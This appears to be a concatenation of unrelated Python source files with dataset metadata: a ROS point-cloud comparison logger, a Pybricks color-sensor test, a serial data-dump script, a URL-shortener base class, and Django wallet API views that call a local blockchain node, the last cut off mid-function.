            self.get_map_proxy = rospy.ServiceProxy("/gsm_node/get_map", GetMap)
            self.tf_logger_proxy = rospy.ServiceProxy('/tensorboard_logger/log_scalar', ScalarToBool)
        return
    def loadScenePointCloud(self, scene_pointcloud_folder_path):
        self.scene_pointcloud_folder_path = scene_pointcloud_folder_path
        if self.scene_pointcloud_folder_path[-1] != "/":
            self.scene_pointcloud_folder_path += "/"

        scene_idx = self.scene_pointcloud_folder_path.split("/")[-2]
        scene_point_move_list = point_move_dict[scene_idx]

        if not os.path.exists(self.scene_pointcloud_folder_path):
            print("[ERROR][PointCloudDiff::loadScenePointCloud]")
            print("\t scene_pointcloud_folder not exist!")
            return False

        scene_pointcloud_folder_filename_list = \
            os.listdir(self.scene_pointcloud_folder_path)

        scene_pointcloud_filename = None
        for scene_pointcloud_folder_filename in scene_pointcloud_folder_filename_list:
            if ".ply" not in scene_pointcloud_folder_filename:
                continue
            scene_pointcloud_filename = scene_pointcloud_folder_filename
            break

        scene_pointcloud_file_path = \
            self.scene_pointcloud_folder_path + scene_pointcloud_filename

        pointcloud_file_path_split_list = scene_pointcloud_file_path.split(".")
        if pointcloud_file_path_split_list[-1] == "obj":
            mesh = o3d.io.read_triangle_mesh(scene_pointcloud_file_path)
            self.scene_pointcloud = o3d.geometry.PointCloud()
            scene_pointcloud_points = np.array(mesh.vertices)
            scene_pointcloud_points[:, :] += scene_point_move_list
            self.scene_pointcloud.points = \
                o3d.utility.Vector3dVector(scene_pointcloud_points)
            self.scene_point_num = scene_pointcloud_points.shape[0]
            return True

        self.scene_pointcloud = o3d.io.read_point_cloud(scene_pointcloud_file_path)
        scene_pointcloud_points = np.array(self.scene_pointcloud.points)
        scene_pointcloud_points[:, :] += scene_point_move_list
        self.scene_pointcloud.points = \
            o3d.utility.Vector3dVector(scene_pointcloud_points)
        self.scene_point_num = scene_pointcloud_points.shape[0]
        self.scene_pointcloud.estimate_normals(
            search_param=o3d.geometry.KDTreeSearchParamHybrid(
                radius=0.1, max_nn=30))
        return True
    def updateObjectPointCloudSavePath(self):
        object_pointcloud_save_basepath = os.path.expanduser('~') + \
            "/.ros/RUN_LOG/PointCloud2ToObjectVecConverterServer/"
        pointcloud_save_folder_list = os.listdir(object_pointcloud_save_basepath)
        if len(pointcloud_save_folder_list) == 0:
            print("[ERROR][PointCloudDiff::updateObjectPointCloudSavePath]")
            print("\t pointcloud_save_folder not exist!")
            return False

        max_idx_list = None
        max_idx_folder_name = None
        for pointcloud_save_folder in pointcloud_save_folder_list:
            date_split_list = pointcloud_save_folder.split("_")
            if len(date_split_list) < 4:
                continue
            if "-" not in date_split_list[3]:
                continue
            time_split_list = date_split_list[3].split("-")
            if (len(time_split_list) != 3):
                continue
            current_idx_list = [
                int(date_split_list[0]),
                int(date_split_list[1]),
                int(date_split_list[2]),
                int(time_split_list[0]),
                int(time_split_list[1]),
                int(time_split_list[2])
            ]
            if max_idx_list is None:
                max_idx_list = current_idx_list
                max_idx_folder_name = pointcloud_save_folder
                continue
            for i in range(len(max_idx_list)):
                if current_idx_list[i] > max_idx_list[i]:
                    max_idx_list = current_idx_list
                    max_idx_folder_name = pointcloud_save_folder
                    break
                if current_idx_list[i] < max_idx_list[i]:
                    break

        if max_idx_folder_name is None:
            print("[ERROR][PointCloudDiff::updateObjectPointCloudSavePath]")
            print("\t find latest folder failed!")
            return False

        self.object_pointcloud_save_path = object_pointcloud_save_basepath + \
            max_idx_folder_name + "/"
        return True
    def getMergePointCloud(self, pointcloud_list):
        merge_pointcloud = o3d.geometry.PointCloud()
        points_list = []
        colors_list = []
        for pointcloud in pointcloud_list:
            points_list.append(np.array(pointcloud.points))
            colors_list.append(np.array(pointcloud.colors))
        merge_points = np.concatenate(points_list, axis=0)
        merge_colors = np.concatenate(colors_list, axis=0)
        merge_pointcloud.points = o3d.utility.Vector3dVector(merge_points)
        merge_pointcloud.colors = o3d.utility.Vector3dVector(merge_colors)
        return merge_pointcloud
    def loadObjectPointCloud(self):
        self.object_pointcloud_list = []
        scene_idx = self.scene_pointcloud_folder_path.split("/")[-2]
        object_point_move_list = point_move_dict[scene_idx]
        object_pointcloud_folder_path = self.scene_pointcloud_folder_path + \
            "region_objects/"
        object_pointcloud_filename_list = os.listdir(object_pointcloud_folder_path)
        for object_pointcloud_filename in object_pointcloud_filename_list:
            object_pointcloud_filepath = object_pointcloud_folder_path + \
                object_pointcloud_filename
            object_pointcloud = o3d.io.read_point_cloud(object_pointcloud_filepath)
            object_points = np.array(object_pointcloud.points)
            object_points[:, :] += object_point_move_list
            object_pointcloud.points = \
                o3d.utility.Vector3dVector(object_points)
            self.object_pointcloud_list.append(object_pointcloud)
        self.merge_object_pointcloud = \
            self.getMergePointCloud(self.object_pointcloud_list)
        self.merge_object_pointcloud.estimate_normals(
            search_param=o3d.geometry.KDTreeSearchParamHybrid(
                radius=0.1, max_nn=30))
        return True

    def loadValidObjectPointCloud(self):
        self.valid_object_pointcloud_list = []
        scene_idx = self.scene_pointcloud_folder_path.split("/")[-2]
        object_point_move_list = point_move_dict[scene_idx]
        object_pointcloud_folder_path = \
            self.scene_pointcloud_folder_path + "valid_region_objects/"
        object_pointcloud_filename_list = \
            os.listdir(object_pointcloud_folder_path)
        for object_pointcloud_filename in object_pointcloud_filename_list:
            object_pointcloud_filepath = object_pointcloud_folder_path + \
                object_pointcloud_filename
            object_pointcloud = o3d.io.read_point_cloud(object_pointcloud_filepath)
            object_points = np.array(object_pointcloud.points)
            object_points[:, :] += object_point_move_list
            object_pointcloud.points = \
                o3d.utility.Vector3dVector(object_points)
            self.valid_object_pointcloud_list.append(object_pointcloud)
        self.merge_valid_object_pointcloud = \
            self.getMergePointCloud(self.valid_object_pointcloud_list)
        self.merge_valid_object_pointcloud.estimate_normals(
            search_param=o3d.geometry.KDTreeSearchParamHybrid(
                radius=0.1, max_nn=30))
        return True
    def loadAllPointCloud(self, scene_pointcloud_folder_path):
        if not self.updateObjectPointCloudSavePath():
            print("[ERROR][PointCloudDiff::loadAllPointCloud]")
            print("\t updateObjectPointCloudSavePath failed!")
            return False
        if not self.loadScenePointCloud(scene_pointcloud_folder_path):
            print("[ERROR][PointCloudDiff::loadAllPointCloud]")
            print("\t loadScenePointCloud failed!")
            return False
        if not self.loadObjectPointCloud():
            print("[ERROR][PointCloudDiff::loadAllPointCloud]")
            print("\t loadObjectPointCloud failed!")
            return False
        if not self.loadValidObjectPointCloud():
            print("[ERROR][PointCloudDiff::loadAllPointCloud]")
            print("\t loadValidObjectPointCloud failed!")
            return False
        return True
    def logScalar(self, name, step, value):
        scalar = Scalar()
        scalar.name = str(name)
        scalar.step = int(step)
        scalar.value = float(value)
        log_success = self.tf_logger_proxy(scalar)
        return log_success
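    # Example (illustrative, added): self.logScalar("PointCloudDiff/scene_error", 12.7, 0.004)
    # publishes a scalar at step 12 -- the step is truncated to int, and the
    # logging methods below all pass elapsed seconds since start as the step.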
    def loadPointCloud2Msg(self, pointcloud2_msg):
        point_list = \
            read_points(pointcloud2_msg,
                        skip_nans=True,
                        field_names=("x", "y", "z"))
        point_array = []
        for point in point_list:
            point_array.append(point[0:3])
        pointcloud = o3d.geometry.PointCloud()
        pointcloud.points = o3d.utility.Vector3dVector(np.array(point_array))
        return pointcloud
    def logSceneData(self):
        pointcloud2_msg = self.get_map_proxy()
        current_pcd = self.loadPointCloud2Msg(pointcloud2_msg.map_cloud)

        dist_to_scene = current_pcd.compute_point_cloud_distance(self.scene_pointcloud)
        dist_to_scene = np.asarray(dist_to_scene)
        avg_dist2_error = 0
        for dist in dist_to_scene:
            avg_dist2_error += dist * dist
        avg_dist2_error /= dist_to_scene.shape[0]

        dist_to_recon = \
            self.scene_pointcloud.compute_point_cloud_distance(current_pcd)
        dist_to_recon = np.asarray(dist_to_recon)
        recon_point_num = len(np.where(dist_to_recon < 0.2)[0])
        recon_percent = 1.0 * recon_point_num / self.scene_point_num

        if not self.logScalar("PointCloudDiff/scene_error",
                              self.last_log_time - self.log_start_time,
                              avg_dist2_error):
            print("[ERROR][PointCloudDiff::logSceneData]")
            print("\t logScalar for point_distance_mean failed!")
            return False
        if not self.logScalar("PointCloudDiff/scene_completeness",
                              self.last_log_time - self.log_start_time,
                              recon_percent):
            print("[ERROR][PointCloudDiff::logSceneData]")
            print("\t logScalar for recon_percent failed!")
            return False
        return True
    def logObjectData(self):
        pointcloud_save_filename_list = \
            os.listdir(self.object_pointcloud_save_path)
        if len(pointcloud_save_filename_list) == 0:
            return True

        object_filename_list = []
        for pointcloud_save_filename in pointcloud_save_filename_list:
            if pointcloud_save_filename[:7] != "object_":
                continue
            object_filename_list.append(pointcloud_save_filename)
        if len(object_filename_list) == 0:
            return True

        object_current_create_time = os.path.getctime(
            self.object_pointcloud_save_path + "object_0.pcd")
        object_current_modify_time = os.path.getmtime(
            self.object_pointcloud_save_path + "object_0.pcd")
        if object_current_create_time == self.object_last_create_time and \
                object_current_modify_time == self.object_last_modify_time:
            return True
        self.object_last_create_time = object_current_create_time
        self.object_last_modify_time = object_current_modify_time

        recon_object_pointcloud_list = []
        for object_filename in object_filename_list:
            recon_object_pointcloud = o3d.io.read_point_cloud(
                self.object_pointcloud_save_path + object_filename)
            if np.array(recon_object_pointcloud.points).shape[0] == 0:
                self.object_last_create_time = None
                self.object_last_modify_time = None
                print("[WARN][PointCloudDiff::logObjectData]")
                print("\t object pointcloud files are updating, skip this logging!")
                return True
            recon_object_pointcloud_list.append(recon_object_pointcloud)

        recon_merge_object_pointcloud = self.getMergePointCloud(
            recon_object_pointcloud_list)
        recon_merge_object_pointcloud.estimate_normals(
            search_param=o3d.geometry.KDTreeSearchParamHybrid(
                radius=0.1, max_nn=30))

        if DEBUG:
            o3d.visualization.draw_geometries([
                self.merge_object_pointcloud, recon_merge_object_pointcloud])
            exit()

        dist_to_scene = \
            recon_merge_object_pointcloud.compute_point_cloud_distance(
                self.merge_object_pointcloud)
        dist_to_scene = np.asarray(dist_to_scene)
        avg_dist2_error = 0
        for dist in dist_to_scene:
            avg_dist2_error += dist * dist
        avg_dist2_error /= dist_to_scene.shape[0]

        dist_to_recon = \
            self.merge_object_pointcloud.compute_point_cloud_distance(
                recon_merge_object_pointcloud)
        dist_to_recon = np.asarray(dist_to_recon)
        recon_point_num = len(np.where(dist_to_recon < 0.2)[0])
        recon_percent = 1.0 * recon_point_num / self.scene_point_num

        if not self.logScalar("PointCloudDiff/object_error",
                              self.last_log_time - self.log_start_time,
                              avg_dist2_error):
            print("[ERROR][PointCloudDiff::logObjectData]")
            print("\t logScalar for point_distance_mean failed!")
            return False
        if not self.logScalar("PointCloudDiff/object_completeness",
                              self.last_log_time - self.log_start_time,
                              recon_percent):
            print("[ERROR][PointCloudDiff::logObjectData]")
            print("\t logScalar for recon_percent failed!")
            return False

        dist_to_scene = \
            recon_merge_object_pointcloud.compute_point_cloud_distance(
                self.merge_valid_object_pointcloud)
        dist_to_scene = np.asarray(dist_to_scene)
        avg_dist2_error = 0
        for dist in dist_to_scene:
            avg_dist2_error += dist * dist
        avg_dist2_error /= dist_to_scene.shape[0]

        dist_to_recon = \
            self.merge_valid_object_pointcloud.compute_point_cloud_distance(
                recon_merge_object_pointcloud)
        dist_to_recon = np.asarray(dist_to_recon)
        recon_point_num = len(np.where(dist_to_recon < 0.2)[0])
        recon_percent = 1.0 * recon_point_num / self.scene_point_num

        if not self.logScalar("PointCloudDiff/valid_object_error",
                              self.last_log_time - self.log_start_time,
                              avg_dist2_error):
            print("[ERROR][PointCloudDiff::logObjectData]")
            print("\t logScalar for point_distance_mean failed!")
            return False
        if not self.logScalar("PointCloudDiff/valid_object_completeness",
                              self.last_log_time - self.log_start_time,
                              recon_percent):
            print("[ERROR][PointCloudDiff::logObjectData]")
            print("\t logScalar for recon_percent failed!")
            return False
        return True
    def startComparePointCloud(self):
        self.log_start_time = time()
        self.last_log_time = self.log_start_time
        while True:
            if not DEBUG:
                sleep(10)
            new_log_time = time()
            if new_log_time == self.last_log_time:
                return True
            self.last_log_time = new_log_time
            if not DEBUG:
                if not self.logSceneData():
                    print("[ERROR][PointCloudDiff::startComparePointCloud]")
                    print("\t logSceneData failed!")
                    break
            if not self.logObjectData():
                print("[ERROR][PointCloudDiff::startComparePointCloud]")
                print("\t logObjectData failed!")
                break
        return True
if __name__ == "__main__":
    rospy.init_node("PointCloudDiff")
    scene_pointcloud_folder_path = \
        os.path.expanduser('~') + "/" + \
        rospy.get_param("/scene_pointcloud_folder_path")

    pointcloud_diff = PointCloudDiff()
    pointcloud_diff.loadAllPointCloud(scene_pointcloud_folder_path)
    pointcloud_diff.startComparePointCloud()
| 40.902273 | 97 | 0.64483 | 1,997 | 17,997 | 5.425138 | 0.100651 | 0.100425 | 0.048459 | 0.043843 | 0.646114 | 0.552612 | 0.464925 | 0.439265 | 0.40096 | 0.391822 | 0 | 0.012526 | 0.276935 | 17,997 | 439 | 98 | 40.995444 | 0.820026 | 0.003667 | 0 | 0.425824 | 0 | 0 | 0.098516 | 0.064376 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032967 | false | 0 | 0.024725 | 0 | 0.145604 | 0.087912 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b5bca6fb329af46502ecd4b3cff5294fef66f40 | 1,314 | py | Python | tests/pup/sensors/color_color.py | cschlack/pybricks-micropython | 0abfd2918267a4e6e7a04062976ac1bb3da1f4b1 | [
"MIT"
] | 115 | 2020-06-15T16:43:14.000Z | 2022-03-21T21:11:57.000Z | tests/pup/sensors/color_color.py | cschlack/pybricks-micropython | 0abfd2918267a4e6e7a04062976ac1bb3da1f4b1 | [
"MIT"
] | 83 | 2020-06-17T17:19:29.000Z | 2022-03-08T18:50:35.000Z | tests/pup/sensors/color_color.py | BertLindeman/pybricks-micropython | 8f22a99551100e66ddf08d014d9f442f22b33b4d | [
"MIT"
] | 40 | 2020-06-15T18:36:39.000Z | 2022-03-28T13:22:43.000Z | # SPDX-License-Identifier: MIT
# Copyright (c) 2020 The Pybricks Authors
"""
Hardware Module: 1
Description: Verifies color sensing and calibration capability.
"""
from pybricks.pupdevices import Motor, ColorSensor, UltrasonicSensor
from pybricks.parameters import Port, Color
# Initialize devices.
motor = Motor(Port.A)
color_sensor = ColorSensor(Port.B)
ultrasonic_sensor = UltrasonicSensor(Port.C)
SPEED = 500
# Color angle targets
angles = {
    "GREEN": 20,
    "BLUE": 110,
    "RED": 200,
    "YELLOW": 290,
    "BLACK": 250,
    "WHITE": 75,
    "NONE": 162,
}
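# (Note added) The motor presumably turns the sensor toward a different color
# swatch at each target angle above; the exact test rig is an assumption here.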
# Verify saturated colors without calibration.
for name in ("GREEN", "BLUE", "RED", "YELLOW"):
    motor.run_target(SPEED, angles[name])
    detected = color_sensor.color()
    assert detected == Color[name], "Expected {0} but got {1}".format(Color[name], detected)

# Update all colors.
for name in angles.keys():
    motor.run_target(SPEED, angles[name])
    Color[name] = color_sensor.hsv()

# Set new colors as detectable colors.
color_sensor.detectable_colors([Color[key] for key in angles.keys()])

# Test all newly calibrated colors.
for name in angles.keys():
    motor.run_target(SPEED, angles[name])
    detected = color_sensor.color()
    assert detected == Color[name], "Expected {0} but got {1}".format(Color[name], detected)
| 26.816327 | 92 | 0.702435 | 173 | 1,314 | 5.277457 | 0.468208 | 0.060241 | 0.029573 | 0.062432 | 0.338445 | 0.338445 | 0.338445 | 0.338445 | 0.338445 | 0.338445 | 0 | 0.028259 | 0.165145 | 1,314 | 48 | 93 | 27.375 | 0.804011 | 0.249619 | 0 | 0.333333 | 0 | 0 | 0.100927 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 1 | 0 | false | 0 | 0.074074 | 0 | 0.074074 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b5c888bbb8125ae3ac660dfc5ba639abf84f105 | 3,406 | py | Python | software/firmware/data_dump.py | lab11/polypoint | 0a21b19db7d00c0b0d9b523a54a6b243a5e64bac | [
"Apache-2.0"
] | 132 | 2015-05-16T10:19:15.000Z | 2022-03-17T22:11:49.000Z | software/module/firmware/data_dump.py | pinsonc/totternary | b938123bec8264927984740f7b435ab0b9ebdbd8 | [
"Apache-2.0"
] | 14 | 2015-05-27T07:55:43.000Z | 2018-06-27T22:57:47.000Z | software/module/firmware/data_dump.py | pinsonc/totternary | b938123bec8264927984740f7b435ab0b9ebdbd8 | [
"Apache-2.0"
] | 56 | 2015-06-27T09:51:13.000Z | 2022-01-22T17:02:42.000Z | #!/usr/bin/env python3
import argparse
import binascii
import os
import struct
import sys
import time  # added: used for the fallback host-side timestamp in the read loop below
import serial
import numpy as np
import scipy.io as sio
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--serial', default='/dev/tty.usbserial-AL00EZAS')
parser.add_argument('-b', '--baudrate', default=3000000, type=int)
parser.add_argument('-o', '--outfile', default='out')
parser.add_argument('-t', '--textfiles', action='store_true',
                    help="Generate ASCII text files with the data")
parser.add_argument('-m', '--matfile', action='store_true',
                    help="Generate Matlab-compatible .mat file of the data")
parser.add_argument('-n', '--binfile', action='store_true',
                    help="Generate binary file of the data")
args = parser.parse_args()
if not (args.textfiles or args.matfile or args.binfile):
    print("Error: Must specify at least one of -t, -m, or -n")
    print("")
    parser.print_help()
    sys.exit(1)
dev = serial.Serial(args.serial, args.baudrate)
if dev.isOpen():
    print("Connected to device at " + dev.portstr)
else:
    raise NotImplementedError("Failed to connect to serial device " + args.serial)
def useful_read(length):
    b = dev.read(length)
    while len(b) < length:
        b += dev.read(length - len(b))
    assert len(b) == length
    return b
HEADER = (0x80018001).to_bytes(4, 'big')
DATA_HEADER = (0x8080).to_bytes(2, 'big')
FOOTER = (0x80FE).to_bytes(2, 'big')
def find_header():
    b = useful_read(len(HEADER))
    while b != HEADER:
        b = b[1:len(HEADER)] + useful_read(1)
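# Framing summary (added note, derived from the constants above): each packet
# is a 4-byte 0x80018001 header, a 1-byte anchor count, one 0x8080-prefixed
# record of data_section_length bytes per anchor, then a 2-byte 0x80FE footer.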
if args.textfiles:
    tsfile = open(args.outfile + '.timestamps', 'w')
    datfile = open(args.outfile + '.data', 'w')
if args.matfile:
    allts = []
    alldata = []
if args.binfile:
    binfile = open(args.outfile + '.bin', 'wb')
good = 0
bad = 0
NUM_RANGING_CHANNELS = 3
data_section_length = 8*NUM_RANGING_CHANNELS + 8+1+1+8+8+30*8
try:
    while True:
        sys.stdout.write("\rGood {} Bad {}\t\t".format(good, bad))
        try:
            find_header()
            # NOTE (added): the packet format parsed here carries no timestamp,
            # but the text/mat writers below expect one; recording the host
            # receive time is an assumption made so those paths are runnable.
            timestamp = time.time()
            num_anchors, = struct.unpack("<B", useful_read(1))
            tline = '['
            inner = []
            bline = struct.pack("<B", num_anchors)

            for x in range(num_anchors):
                b = useful_read(len(DATA_HEADER))
                if b != DATA_HEADER:
                    raise AssertionError
                data = useful_read(data_section_length)
                bline += data

            tline += ']'

            #bline += useful_read(4) # round_num
            #bline += useful_read(2) # fp_idx
            #bline += useful_read(2) # fp_idx
            #bline += useful_read(4) # finfo

            footer = useful_read(len(FOOTER))
            if footer != FOOTER:
                raise AssertionError

            good += 1
            if args.textfiles:
                tsfile.write(str(timestamp) + '\n')
                datfile.write(tline + '\n')
            if args.matfile:
                allts.append(timestamp)
                alldata.append(inner)
            if args.binfile:
                binfile.write(bline)
        except AssertionError:
            bad += 1
except KeyboardInterrupt:
    pass

print("\nGood {}\nBad {}".format(good, bad))

if args.textfiles:
    print("Wrote ASCII outputs to " + args.outfile + ".{timestamps,data}")
if args.matfile:
    sio.savemat(args.outfile+'.mat', {
        'timestamps': allts,
        'data': alldata,
    })
    print('Wrote Matlab-friendly file to ' + args.outfile + '.mat')
if args.binfile:
    print('Wrote binary output to ' + args.outfile + '.bin')
    print('\tBinary data is formatted as:')
    print('\t<uint64_t><int16_t><int16_t><int16_t><int16_t>... all little endian')
    print('\ttimestamp real0 imag0 real1 imag1 ...')
    print('\tFor 1024 total complex numbers')
| 24.328571 | 79 | 0.66882 | 487 | 3,406 | 4.577002 | 0.347023 | 0.049349 | 0.04576 | 0.025572 | 0.132346 | 0.036788 | 0.036788 | 0.025572 | 0.025572 | 0 | 0 | 0.024779 | 0.170581 | 3,406 | 139 | 80 | 24.503597 | 0.764248 | 0.043159 | 0 | 0.128713 | 0 | 0 | 0.227762 | 0.024007 | 0 | 0 | 0.006771 | 0 | 0.039604 | 1 | 0.019802 | false | 0.009901 | 0.079208 | 0 | 0.108911 | 0.118812 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b5f3d38d66083adf3fa27d5150cb13f0c26d96e | 4,642 | py | Python | venv/Lib/site-packages/pyshorteners/base.py | arturj9/encurtar-link | 2e5bfdd2b2525f10f41942c79cb45cc4e43a24ee | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pyshorteners/base.py | arturj9/encurtar-link | 2e5bfdd2b2525f10f41942c79cb45cc4e43a24ee | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pyshorteners/base.py | arturj9/encurtar-link | 2e5bfdd2b2525f10f41942c79cb45cc4e43a24ee | [
"MIT"
] | null | null | null | import requests
import re
from .exceptions import BadURLException, ExpandingErrorException
URL_RE = re.compile(
    r"(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.]"
    r"[a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)"
    r"))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()"
    r'\[\]{};:\'".,<>?«»“”‘’]))'
)
class BaseShortener:
    """Base Class for all shorteners.

    Keyword Args:
        proxies (dict, optional): Web proxy configuration for :ref:`Requests
            Proxies <requests:proxies>`.
        timeout (int, optional): Seconds before request is killed.
        verify (bool, str, optional): SSL Certificate verification for
            :ref:`Requests Verification <requests:verification>`.

    Example:
        >>> class NewShortener(BaseShortener):
        ...     api_url = 'http://the/link/for/the/api'
        ...     def short(self, url):
        ...         pass
        ...     def expand(self, url):
        ...         pass
        ...     def custom_method(self):
        ...         pass
    """

    def __init__(self, **kwargs):
        for key, item in list(kwargs.items()):
            setattr(self, key, item)

        # safe check
        self.timeout = getattr(self, "timeout", 2)
        self.verify = getattr(self, "verify", True)
        self.proxies = getattr(self, "proxies", {})

    def _get(self, url, params=None, headers=None):
        """Wrap a GET request with a url check.

        Args:
            url (str): URL shortener address.

        Keyword Args:
            headers (dict): HTTP headers to add, `Requests Custom Headers`_.
            params (dict): URL parameters, `Requests Parameters`_.

        .. _Requests Custom Headers: http://requests.kennethreitz.org/en/master/user/quickstart/#custom-headers
        .. _Requests Parameters: http://requests.kennethreitz.org/en/master/user/quickstart/#passing-parameters-in-urls

        Returns:
            requests.Response: HTTP response.
        """
        url = self.clean_url(url)
        response = requests.get(
            url,
            params=params,
            verify=self.verify,
            timeout=self.timeout,
            headers=headers,
            proxies=self.proxies,
        )
        return response

    def _post(self, url, data=None, json=None, params=None, headers=None):
        """Wrap a POST request with a url check.

        Args:
            url (str): URL shortener address.

        Keyword Args:
            data (dict, str): Form-encoded data, `Requests POST Data`_.
            headers (dict): HTTP headers to add, `Requests Custom Headers`_.
            json (dict): Python object to JSON encode for data, `Requests
                POST Data`_.
            params (dict): URL parameters, `Requests Parameters`_.

        .. _Requests Custom Headers: http://requests.kennethreitz.org/en/master/user/quickstart/#custom-headers
        .. _Requests Parameters: http://requests.kennethreitz.org/en/master/user/quickstart/#passing-parameters-in-urls
        .. _Requests POST Data: http://requests.kennethreitz.org/en/master/user/quickstart/#more-complicated-post-requests

        Returns:
            requests.Response: HTTP response.
        """
        url = self.clean_url(url)
        response = requests.post(
            url,
            data=data,
            json=json,
            params=params,
            headers=headers,
            timeout=self.timeout,
            verify=self.verify,
            proxies=self.proxies,
        )
        return response

    def short(self, url):
        """Shorten URL using a shortening service.

        Args:
            url (str): URL to shorten.

        Raises:
            NotImplementedError: Subclass must override.
        """
        raise NotImplementedError

    def expand(self, url):
        """Expand URL using a shortening service.

        Only visits the link, and returns the response url.

        Args:
            url (str): URL to shorten.

        Raises:
            ExpandingErrorException: URL failed to expand.
        """
        url = self.clean_url(url)
        response = self._get(url)
        if response.ok:
            return response.url
        raise ExpandingErrorException

    @staticmethod
    def clean_url(url):
        """URL validation.

        Args:
            url (str): URL to shorten.

        Raises:
            BadURLException: URL is not valid.
        """
        if not url.startswith(("http://", "https://")):
            url = f"http://{url}"
        if not URL_RE.match(url):
            raise BadURLException(f"{url} is not valid")
        return url
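    # Illustrative subclass sketch (added; hypothetical service, not part of
    # this module -- the URL and query parameter are made up):
    #
    #   class EchoShortener(BaseShortener):
    #       api_url = "https://example.invalid/api"
    #       def short(self, url):
    #           return self._get(self.api_url, params={"u": url}).text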
| 29.948387 | 122 | 0.554718 | 490 | 4,642 | 5.206122 | 0.273469 | 0.016464 | 0.0196 | 0.02548 | 0.437084 | 0.416699 | 0.358683 | 0.325755 | 0.306546 | 0.268914 | 0 | 0.002182 | 0.308919 | 4,642 | 154 | 123 | 30.142857 | 0.792394 | 0.497199 | 0 | 0.309091 | 0 | 0.036364 | 0.121133 | 0.082328 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109091 | false | 0 | 0.054545 | 0 | 0.254545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b5fb3612eed2c2c094b3078cd58aaf1ac0191cc | 3,937 | py | Python | walletUI/wallet/views.py | avinashshenoy97/brownie-points | 27eb1e9a5ab685e72a5b701c0f76af44d9700960 | [
"MIT"
] | 1 | 2020-11-25T12:14:40.000Z | 2020-11-25T12:14:40.000Z | walletUI/wallet/views.py | avinashshenoy97/brownie-points | 27eb1e9a5ab685e72a5b701c0f76af44d9700960 | [
"MIT"
] | null | null | null | walletUI/wallet/views.py | avinashshenoy97/brownie-points | 27eb1e9a5ab685e72a5b701c0f76af44d9700960 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
import requests
import os,sys,inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
main_dir = os.path.dirname(parentdir)
sys.path.insert(0,main_dir)
print(sys.path)
context={}
myAddress=''
def wallet(request):
    return render(request, "index.html", context)
class sendCoinsView(APIView):
    def put(self, request):
        print("put", request.data)
        r = requests.post('http://127.0.0.1:16000/control/sendTransaction', json=request.data)
        data = {"transactionNumber": 1, "statusCode": r.status_code}
        return Response(data)
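# (Note added) All views below proxy to the local blockchain node at
# 127.0.0.1:16000 and reshape its JSON for the wallet UI; `myAddress` is cached
# by publicAddressView and then used to filter incoming/outgoing transactions.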
class transactionStatusView(APIView):
    def get(self, request):
        global myAddress
        pendingTx = requests.get('http://127.0.0.1:16000/control/getTransactionPool', params=request.data)
        print("pending", pendingTx.json())
        if (len(pendingTx.json()) == 0):
            transactionAddr = []
            transactionCoins = []
            transactionAddrSender = []
        else:
            transactionAddr = [x['txOuts'][0]['address'] for x in pendingTx.json() if x['txOuts'][1]['address'] == myAddress]
            transactionCoins = [x['txOuts'][0]['amount'] for x in pendingTx.json() if x['txOuts'][1]['address'] == myAddress]
            transactionAddrSender = [x['txOuts'][1]['address'] for x in pendingTx.json() if x['txOuts'][1]['address'] == myAddress]
        completedTx = requests.get('http://127.0.0.1:16000/control/getAllBlocks', params=request.data)
        print("complete", completedTx.json())
        completedTxAddr = []
        completedTxAmt = []
        completedTxSenderAddr = []
        for blocks in completedTx.json():
            for txs in blocks['data']:
                if (len(txs['txOuts']) == 1):
                    if txs['txOuts'][0]['address'] == myAddress:
                        completedTxAddr.append(txs['txOuts'][0]['address'])
                        completedTxAmt.append(txs['txOuts'][0]['amount'])
                        completedTxSenderAddr.append(txs['txOuts'][0]['address'])
                else:
                    if txs['txOuts'][1]['address'] == myAddress:
                        completedTxAddr.append(txs['txOuts'][0]['address'])
                        completedTxAmt.append(txs['txOuts'][0]['amount'])
                        completedTxSenderAddr.append(txs['txOuts'][1]['address'])
        data = {"transactionAddr": transactionAddr, "transactionCoins": transactionCoins, "transactionAddrSender": transactionAddrSender, "completedTxAddr": completedTxAddr, "completedTxAmt": completedTxAmt, "completedTxSenderAddr": completedTxSenderAddr}
        print(data)
        return Response(data)
class publicAddressView(APIView):
    def get(self, request):
        global myAddress
        publicAddr = requests.get('http://127.0.0.1:16000/control/getWalletAddress', params=request.data)
        myAddress = publicAddr.json()['address']
        data = {"publicKey": publicAddr.json()['address']}
        print(data)
        return Response(data)
class balanceView(APIView):
    def get(self, request):
        global myAddress
        balance = requests.get('http://127.0.0.1:16000/control/getUnspentTxOuts', params=request.data)
